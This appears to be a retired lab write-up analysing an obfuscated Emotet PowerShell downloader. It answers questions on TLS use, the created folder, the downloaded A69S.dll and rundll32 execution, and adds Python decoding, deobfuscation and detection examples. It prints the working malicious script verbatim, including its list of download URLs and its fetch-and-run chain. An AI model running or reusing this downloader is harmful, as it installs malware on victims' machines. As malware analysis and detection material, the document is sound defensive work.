Malicious PowerShell Analysis

  1. What security protocol is being used for the communication with a malicious domain? (3 points)

    Based on the PowerShell script, it's obvious that some form of encoding was used for the payload. It uses standard CLI arguments, giving me the impression that it's likely using base64. Decoding it with CyberChef gives us semi-legible output (UTF-16LE text, with a null byte between characters), which we then need to run through Decode text with the encoding UTF-16LE (1200) to get the final output.
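    The two CyberChef steps above (From Base64, then Decode text as UTF-16LE) can be scripted for triage. The following is an added example, not code from the original write-up: it pulls the Base64 argument out of a launcher command line, sniffs whether the decoded bytes are UTF-16LE or UTF-8, and returns the script text. The command line and script are constructed samples; the function names are this example's own.

```python
import base64
import re

# Constructed sample command line (not the page's payload): a launcher that passes
# a Base64 blob of a UTF-16LE script via -enc, which is what -EncodedCommand expects.
SCRIPT = "Write-Host 'hello'"
SAMPLE_CMDLINE = ("powershell.exe -nop -w hidden -enc "
                  + base64.b64encode(SCRIPT.encode("utf-16le")).decode("ascii"))

# -e, -ec, -en, -enc ... -EncodedCommand: PowerShell accepts any unambiguous prefix.
# '-e' followed by 'x' (as in -ExecutionPolicy) is excluded by the character class.
ENC_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})")


def extract_encoded_blob(cmdline):
    """Return the Base64 argument of an encoded-command switch, or None."""
    m = ENC_ARG.search(cmdline)
    return m.group(1) if m else None


def decode_blob(blob):
    """Base64-decode and choose the text encoding: -EncodedCommand payloads are
    UTF-16LE (the 'semi-legible' output with NULs between characters), while a
    blob pasted from elsewhere may be plain UTF-8. Sniff the odd bytes for NULs."""
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))  # tolerate stripped padding
    odd_bytes = raw[1::2]
    if odd_bytes and odd_bytes.count(0) > len(odd_bytes) // 2:
        return raw.decode("utf-16le")
    return raw.decode("utf-8", errors="replace")


def decode_command_line(cmdline):
    """Full pipeline: find the switch, decode the blob, return the script text (or None)."""
    blob = extract_encoded_blob(cmdline)
    return decode_blob(blob) if blob else None


if __name__ == "__main__":
    print(decode_command_line(SAMPLE_CMDLINE))
```

    The NUL-sniffing step is what replaces the second CyberChef operation: if the odd-numbered bytes are mostly zero, the text is UTF-16LE and must be decoded as such rather than as UTF-8.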

     sEt MKu ( [TYPe]("{0}{1}{2}{4}{3}" -F 'SYsT','eM.','io.DI','ORY','rECt') );    SeT-iTEM  ('vaR'+'IabLE'+':mBu') (  [TYPe]("{6}{8}{0}{3}{4}{5}{2}{7}{1}" -f'SteM','Ger','Ma','.n','et.seRVIcepOi','nt','s','NA','Y')); $ErrorActionPreference = (('S'+'il')+('en'+'t')+'ly'+('Cont'+'i'+'nue'));$Cvmmq4o=$Q26L + [char](64) + $E16H;$J16J=('N'+('_0'+'P')); (DIr VariabLE:Mku  ).VaLUe::"c`REAt`edI`REC`TORy"($HOME + (('{'+'0}Db_bh'+'30'+'{0}'+'Yf'+'5be5g{0}') -F [chAR]92));$C39Y=(('U6'+'8')+'S');  ( vARiaBLe  ("m"+"bu")  -VAlueoN  )::"sEcuRITYproT`o`c`ol" = ('T'+('ls'+'12'));$F35I=('I'+('4'+'_B'));$Swrp6tc = (('A6'+'9')+'S');$X27H=('C3'+'3O');$Imd1yck=$HOME+((('UO'+'H'+'Db_')+'b'+('h3'+'0UO')+('HY'+'f')+('5be5'+'g'+'UOH'))."ReP`lACe"(('U'+'OH'),[StrInG][chAr]92))+$Swrp6tc+(('.'+'dl')+'l');$K47V=('R'+('4'+'9G'));$B9fhbyv=(']'+('a'+'nw[3s://adm'+'int'+'k.c'+'o'+'m/'+'w')+('p-adm'+'in/'+'L/')+'@'+(']a'+'n'+'w[3s')+':'+'/'+'/m'+('ike'+'ge')+('e'+'r'+'inck.')+('c'+'om')+('/c/'+'Y'+'Ys')+'a'+('/@]'+'anw'+'['+'3://free'+'lanc'+'e'+'rw')+('ebdesi'+'gnerh'+'yd')+('er'+'aba')+('d.'+'com/')+('cgi'+'-bin'+'/S')+('/'+'@'+']anw')+('[3'+'://'+'etdog.co'+'m'+'/w')+('p-'+'co')+'nt'+('e'+'nt')+('/n'+'u/@')+(']a'+'nw[3')+'s'+('://'+'www'+'.hintu'+'p.c')+('o'+'m.')+('b'+'r/')+'w'+('p'+'-co')+('n'+'ten')+('t'+'/dE/'+'@]a'+'nw[3://'+'www.')+'s'+('tm'+'arouns'+'.')+('ns'+'w')+('.'+'edu.au/p'+'a'+'y'+'pal/b8')+('G'+'/@]')+('a'+'nw[')+('3:'+'/')+('/'+'wm.mcdeve'+'lop.net'+'/'+'c'+'on'+'t'+'e')+('nt'+'/')+'6'+('F2'+'gd/'))."RE`p`lACe"(((']a'+'n')+('w'+'[3')),([array]('sd','sw'),(('h'+'tt')+'p'),'3d')[1])."s`PLIT"($C83R + $Cvmmq4o + $F10Q);$Q52M=('P'+('0'+'5K'));foreach ($Bm5pw6z in $B9fhbyv){try{(&('New'+'-Objec'+'t') SysTem.nEt.WEBcLIeNT)."do`WNl`OaD`FIlE"($Bm5pw6z, $Imd1yck);$Z10L=('A9'+'2Q');If ((&('Ge'+'t-It'+'em') $Imd1yck)."len`G`TH" -ge 35698) {&('r'+'undl'+'l32') 
$Imd1yck,(('Co'+'nt')+'r'+('ol'+'_RunD'+'L')+'L')."T`OSt`RiNG"();$R65I=('Z'+('09'+'B'));break;$K7_H=('F1'+'2U')}}catch{}}$W54I=(('V9'+'5')+'O')
    

    We can see in the following snippet that the HTTP portion of each URL is inserted via a Replace call, with the method name broken up by backticks:

    "RE`p`lACe"(((']a'+'n')+('w'+'[3')),([array]('sd','sw'),(('h'+'tt')+'p'),'3d')[1])
    

    If you look at where this is actually called, the replaced strings have a trailing s, making the URLs use https. However, this isn't the answer they're looking for.

    We can find the answer in the snippet below, which is still legible:

    "sEcuRITYproT`o`c`ol" = ('T'+('ls'+'12'))
    

    Answer: TLS 12

  2. What directory does the obfuscated PowerShell create? (Starting from \HOME\) (4 points)

    Manually de-obfuscating the payload bit by bit (joining the concatenated strings, resolving the -F format operator and dropping the backticks), we eventually get the following relevant snippet:

    (DIr VariabLE:Mku  ).VaLUe::"CREATEDIRECTORY"($HOME + ('\Db_bh30\Yf5be5g\'));
    

    Answer: \HOME\Db_bh30\Yf5be5g\

  3. What file is being downloaded (full name)? (4 points)

    Another one of the deobfuscated snippets is:

    $Imd1yck=$HOME+'\Db_bh30\Yf5be5g\A69S.dll';
    

    Answer: A69S.dll
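    The manual steps used in questions 1 to 3 (dropping backticks from quoted member names, resolving the "{0}{1}" -F format operator, folding ('a'+'b') concatenations, evaluating the indexed array that yields 'http', and applying the Replace that rebuilds the URLs) can be automated. The following is an added example, not the write-up's or any tool's own code: it runs those passes over a constructed, shortened sample assembled from the page's own obfuscation constructs and two of its URL fragments, then lists the resulting domains. Function names such as deobfuscate and extract_domains are this example's own.

```python
import re
from urllib.parse import urlparse

# Constructed sample (shortened, hypothetical) using the same obfuscation layers
# as the page's script: backtick-broken member names, ('a'+'b') concatenation,
# the -F format operator, a marker swapped for "http" via Replace, a '@' split.
SAMPLE = r"""sEt MKu ( [TYPe]("{0}{1}{2}{4}{3}" -F 'SYsT','eM.','io.DI','ORY','rECt') );
$B9fhbyv=(']'+('a'+'nw[3s://adm'+'int'+'k.c'+'o'+'m/'+'w')+('p-adm'+'in/'+'L/')+'@'+(']anw'+'[3://'+'wm.mcdeve'+'lop.net'+'/'+'c'+'on'+'t'+'e')+('nt'+'/')+'6'+('F2'+'gd/'))."RE`p`lACe"(((']a'+'n')+('w'+'[3')),([array]('sd','sw'),(('h'+'tt')+'p'),'3d')[1])."s`PLIT"('@')"""

TOKEN = re.compile(r"'[^']*'|\"[^\"]*\"|\s+|\w+|.")


def strip_backticks(code):
    # Backticks inside double-quoted member names ("RE`p`lACe") only split the word
    # for signature evasion; PowerShell drops them, so we do too.
    return re.sub(r'"([^"]*)"', lambda m: '"' + m.group(1).replace('`', '') + '"', code)


def normalize_members(code):
    # ."ReplACe"( or ::"CREATEDIRECTORY"( -> .replace( / ::createdirectory(
    # Member names are case-insensitive; the quotes are just obfuscation.
    return re.sub(r'(::|\.)"([A-Za-z]+)"\s*\(',
                  lambda m: m.group(1) + m.group(2).lower() + '(', code)


def resolve_format(code):
    # ("{0}{1}" -F 'a','b') -> ('ab'): reorder literal arguments by placeholder index
    pat = re.compile(r"\(\s*\"((?:\{\d+\})+)\"\s*-[fF]\s*((?:'[^']*'\s*,\s*)*'[^']*')\s*\)")

    def build(m):
        order = [int(i) for i in re.findall(r"\{(\d+)\}", m.group(1))]
        args = re.findall(r"'([^']*)'", m.group(2))
        return "('" + "".join(args[i] for i in order) + "')"
    return pat.sub(build, code)


def _is_str(tok):
    return len(tok) >= 2 and tok[0] == "'" and tok[-1] == "'"


def collapse_concat(code):
    # Repeatedly fold 'a'+'b' into 'ab' and ('a') into 'a' until nothing changes.
    # Parentheses right after an identifier, ']' or ')' are a call/cast, not grouping.
    toks = TOKEN.findall(code)
    while True:
        out, i, changed = [], 0, False
        while i < len(toks):
            t = toks[i]
            if _is_str(t) and i + 2 < len(toks) and toks[i + 1] == '+' and _is_str(toks[i + 2]):
                out.append("'" + t[1:-1] + toks[i + 2][1:-1] + "'")
                i, changed = i + 3, True
            elif (t == '(' and i + 2 < len(toks) and _is_str(toks[i + 1]) and toks[i + 2] == ')'
                  and not (out and re.fullmatch(r"\w+|[\])]", out[-1]))):
                out.append(toks[i + 1])
                i, changed = i + 3, True
            else:
                out.append(t)
                i += 1
        toks = out
        if not changed:
            return "".join(toks)


def resolve_index(code):
    # ([array]('sd','sw'),'http','3d')[1] -> 'http': pick the indexed element of a literal list
    item = r"\[array\]\([^()]*\)|'[^']*'"
    pat = re.compile(r"\(((?:" + item + r")(?:\s*,\s*(?:" + item + r"))*)\)\[(\d+)\]")
    return pat.sub(lambda m: re.findall(item, m.group(1))[int(m.group(2))], code)


def resolve_replace(code):
    # 'text'.replace('old','new') on literals -> the replaced literal
    pat = re.compile(r"'([^']*)'\.replace\('([^']*)'\s*,\s*'([^']*)'\)")
    return pat.sub(lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", code)


def deobfuscate(code):
    for step in (strip_backticks, normalize_members, resolve_format,
                 collapse_concat, resolve_index, resolve_replace):
        code = step(code)
    return code


def extract_urls(code):
    # The '@' separator between URLs is excluded so each entry comes out on its own.
    return re.findall(r"https?://[^\s'\"@]+", deobfuscate(code))


def extract_domains(code):
    return [urlparse(u).netloc for u in extract_urls(code)]


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(extract_domains(SAMPLE))
```

    On the sample this yields [TYPe]('SYsTeM.io.DIrECtORY') for the first statement and a single literal holding the two URLs joined by '@' for the second, from which the domain list is read off; the same passes applied to the full script give the directory, DLL name and URL list quoted in the answers above. The passes are ordered so each one only has to handle literals left behind by the previous one.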

  4. What is used to execute the downloaded file? (3 points)

    The following snippet is still relevant:

    foreach ($Bm5pw6z in $B9fhbyv){try{(&('New-Object') SYSTEM.NET.WEBCLIENT)."DOWNLOAD`FILE"($Bm5pw6z, $Imd1yck);If ((&('Get-Item') $Imd1yck)."length" -ge 35698) {&('rundll32') $Imd1yck,('Control_RunDLL')."TOSTRING"();break;}}catch{}}
    

    Answer: rundll32
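    The execution chain in this snippet (PowerShell drops a DLL under the user's profile, checks its size, then runs it through rundll32 with the Control_RunDLL export) is also what a detection can key on. The following is an added example, not code from the write-up: it scores constructed process-creation records with Sysmon-style fields and flags rundll32 launches that combine a DLL outside the system directories, a PowerShell parent, and the Control_RunDLL export. The events, user names and thresholds are constructed for this example.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields
# (sample data, not real telemetry). The first mirrors the behaviour analysed on
# the page: PowerShell running a dropped DLL from the user profile via rundll32.
EVENTS = [
    {"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32 C:\\Users\\alice\\Db_bh30\\Yf5be5g\\A69S.dll,Control_RunDLL"},
    {"ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL desk.cpl"},
    {"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32 C:\\Users\\bob\\AppData\\Local\\Temp\\x.dll,DllRegisterServer"},
    {"ParentImage": "C:\\Windows\\System32\\services.exe",
     "Image": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

# Directories from which Windows itself loads DLLs via rundll32; anything else is
# typically user-writable and worth a closer look.
TRUSTED_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# rundll32 <path>.dll,<ExportName> with optional quoting around the path
DLL_ARG = re.compile(r'(?i)rundll32(?:\.exe)?\s+"?([^",\s]+\.dll)"?\s*,\s*(\w+)')


def assess_rundll32(event):
    """Return the list of reasons this record is suspicious (empty list = nothing found)."""
    if not event["Image"].lower().endswith("\\rundll32.exe"):
        return []
    m = DLL_ARG.search(event["CommandLine"])
    if not m:
        return []
    dll, export = m.group(1).lower(), m.group(2).lower()
    reasons = []
    if not dll.startswith(TRUSTED_DLL_DIRS):
        reasons.append("dll outside system directories: " + dll)
    if event["ParentImage"].lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        reasons.append("spawned by PowerShell")
    if export == "control_rundll" and reasons:
        # Control_RunDLL exists to start Control Panel applets from shell32.dll;
        # pointing it at a user-writable DLL is how the analysed script runs its payload.
        reasons.append("Control_RunDLL export used on a non-system DLL")
    return reasons


def find_suspicious(events, min_reasons=2):
    """Indices of events that trip at least min_reasons independent checks (cuts noise)."""
    return [i for i, e in enumerate(events) if len(assess_rundll32(e)) >= min_reasons]


if __name__ == "__main__":
    for i in find_suspicious(EVENTS):
        print(i, assess_rundll32(EVENTS[i]))
```

    The benign shell32.dll,Control_RunDLL record scores nothing because the DLL lives in System32 and the parent is Explorer; requiring two independent reasons keeps single-signal noise (a lone user-profile DLL, or any rundll32 child of PowerShell) out of the alert.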

  5. What is the domain name of the URI ending in '/6F2gd/'? (3 points)

    The full URL is:

    http://wm.mcdevelop.net/content/6F2gd/
    

    Answer: wm.mcdevelop.net

  6. Based on the analysis of the obfuscated code, what is the name of the malware? (3 points)

    Searching Google for "A69S.dll malware" shows us an ANY.RUN page that flags the file as emotet.

    Answer: emotet


Tags

  1. powershell (Private)
  2. malware (Private)
  3. 20 points (Private)
  4. retired (Private)